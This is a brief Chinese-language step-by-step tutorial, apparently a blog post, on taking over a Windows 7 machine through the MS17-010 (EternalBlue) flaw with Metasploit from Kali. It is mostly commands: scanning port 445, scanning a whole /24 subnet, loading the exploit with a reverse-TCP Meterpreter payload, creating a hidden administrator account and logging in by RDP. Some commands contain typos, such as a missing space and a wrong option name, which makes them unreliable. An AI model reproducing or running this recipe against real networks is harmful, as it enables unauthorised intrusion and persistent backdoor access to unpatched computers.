MS17-010漏洞利用工具系统入侵(实测)
一、打开kali和win7查看IP。(1) Windows7作为靶机
(2) Kali作为攻击机(最新版kaili)
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。
三、在kali中输入
msfconsole
(等待一会可能会有点慢)
四、进入后输人
search ms17-010
(就是之前的永恒之蓝,也就是新闻上报道的比特币勒索病毒)
五、找到
exploit windows/smb/ms17_010_eternalblue
运行
use exploitwindows/smb/ms17_010_eternalblue
六、输入
show options
查看和配置RHOST(靶机)和LHOST(操作机)
由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入
set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞,然后再
set RHOST +IP
七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
八、
run或exploit进行攻击
九、可以创建用户
net user xxxx 1234 /add
(xxxx用户名 1234密码)
十、
net localgroup administrators xxxx /add
(将用户设置为管理员权限)
十一、重新打开一个终端
rdesktop+IP
这样就进去了。